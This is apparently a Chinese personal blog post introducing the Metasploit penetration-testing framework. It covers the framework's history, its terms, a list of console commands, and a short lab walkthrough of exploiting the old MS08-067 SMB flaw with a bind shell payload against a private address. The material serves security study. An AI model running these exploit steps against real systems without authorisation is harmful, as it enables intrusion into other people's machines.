metasploit MSF基本使用方式 - JunMo博客

JunMo的博客

2019
记录生活
首页 » KALI » metasploit MSF基本使用方式

metasploit MSF基本使用方式

metasploit简介

Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。

Metasploit Framework最初是 HD Moore 个人的想法,当时他在一家安全公司工作,他于2003年10月发布了第一个基于Perl的Metasploit版本,一开始只有共11个漏洞利用程序。后来随着Spoonm帮助和加入,HD发布于2004年4月重写了该项目并发布了Metasploit2.0。此版本包括19个漏洞和超过27个payload。在这个版本之发布后不久,马特米勒(Skape)加入了Metasploit的开发团队,使得该项目日益流行,Metasploit Framework也收到来自信息安全界的大力支持,并迅速成为一个渗透测试必备的工具。

在2004年8月HD Moore 和 Spoonm 等4名年轻人在black hat会议上首次公布了该项目,Metasploit的团队在2007年使用Ruby编程语言完全重写并发布了Metasploit3.0,这次Metasploit从Perl到Ruby的迁移历时18个月,增加超过15万行的新代码。随着3.0版本的发布,Metasploit开始被广泛的采用,在整个安全社区也受到了大幅增加的帮助和贡献。 请输入图片描述

在2009年秋季,Rapid7收购了Metasploit,Rapid7是一个在漏洞扫描领域的领导者公司,被收购之后,Rapid7公司允许HD建立一个团队,仅仅着重于Metasploit Framework的开发。也正由于这样,这次收购使得Metasploit Framework开始更迅速地发展。HD Moore也成为了Rapid7公司的CSO(Chief Security Officer),同时他也是Metasploit的首席架构师。

术语

渗透攻击(Exploit),指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。

攻击载荷(Payload),是我们期望目标系统在被渗透攻击之后去执行的代码。

Shellcode,是在渗透攻击是作为攻击载荷运行的一组机器指令,通常用汇编语言编写。

模块(Module),指Metasploit框架中所使用的一段软件代码组件,可用于发起渗透攻击或执行某些辅助攻击动作。

监听器(Listener),是Metasploit中用来等待网络连接的组件。

更多内容:

1、Metasploit下载:https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

2、Metasploit入门:https://www.metasploit.com/get-started

3、Metasploit手册:https://metasploit.help.rapid7.com/docs

基本命令

=============

?   帮助菜单

banner   显示一个真棒metasploit横幅

cd   更改当前的工作目录

color   切换颜色

connect   连接与主机通信

exit   退出控制台

get   获取特定于上下文的变量的值

getg   获取全局变量的值

grep grep另一个命令的输出

help   帮助菜单

history   显示命令历史

irb   进入irb脚本模式

load   加载一个框架插件

quit   退出控制台

route   通过会话路由流量

save   保存活动的数据存储

sessions    转储会话列表并显示有关会话的信息

set   将特定于上下文的变量设置为一个值

setg   将全局变量设置为一个值

sleep   在指定的秒数内不做任何事情

spool   将控制台输出写入文件以及屏幕

threads   线程查看和操作后台线程

unload   卸载框架插件

unset   取消设置一个或多个特定于上下文的变量

unsetg   取消设置一个或多个全局变量

version   显示框架和控制台库版本号

模块命令

===============

advanced   显示一个或多个模块的高级选项

back   从当前上下文返回

edit   使用首选编辑器编辑当前模块

info   显示有关一个或多个模块的信息

loadpath   路径从路径搜索并加载模块

options   显示全局选项或一个或多个模块

popm   将最新的模块从堆栈中弹出并使其处于活动状态

previous   将之前加载的模块设置为当前模块

pushm   将活动或模块列表推入模块堆栈

reload_all   从所有定义的模块路径重新加载所有模块

search   搜索模块名称和描述

show   显示给定类型的模块或所有模块

use   按名称选择模块

工作命令

============

handler   作为作业启动负载处理程序

jobs   显示和管理作业

kill   杀死一个工作

rename_job   重命名作业

资源脚本命令

========================

makerc   保存从开始到文件输入的命令

resource   运行存储在文件中的命令

数据库后端命令

=========================

db_connect   连接到现有的数据库

db_disconnect   断开与当前数据库实例的连接

db_export   导出包含数据库内容的文件

db_import   导入扫描结果文件(文件类型将被自动检测)

db_nmap   执行nmap并自动记录输出

db_rebuild_cache   重建数据库存储的模块高速缓存

db_status   显示当前的数据库状态

hosts   列出数据库中的所有主机

loot   列出数据库中的所有战利品

notes   列出数据库中的所有笔记

services   列出数据库中的所有服务

vulns   列出数据库中的所有漏洞

workspace   在数据库工作区之间切换

凭证后端命令

============================

creds   列出数据库中的所有凭据

Metasploit MS08-067漏洞利用演示实验

 启动msf

msfconsole 

搜索模块

search ms08_067

使用模块

use exploit/windows/smb/ms08_067_netapi

查看需要配置的参数,Required为yes就是必须要填的参数

show options

设置目标ip

set RHOST 192.168.0.102

查看可用payload

show payloads

使用payload

set payload windows/shell/bind_tcp 

查看可用选择的系统(这里我就不设置了他会自动选择)

检测是否存在漏洞(部分模块可能没有)

check

运行模块

exploit或者run

解决metasploit乱码

OK成功解决

文章如无特别注明均为原创!
本文作者: JunMo
转载或复制请带上本文地址 http://mo60.cn/post-44.html
并注明出处 JunMo博客
原文地址《 metasploit MSF基本使用方式
发布于2019-7-24
收录状态: [百度已收录][360未收录]

分享到:


打赏

评论

游客

看不清楚?点图切换

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册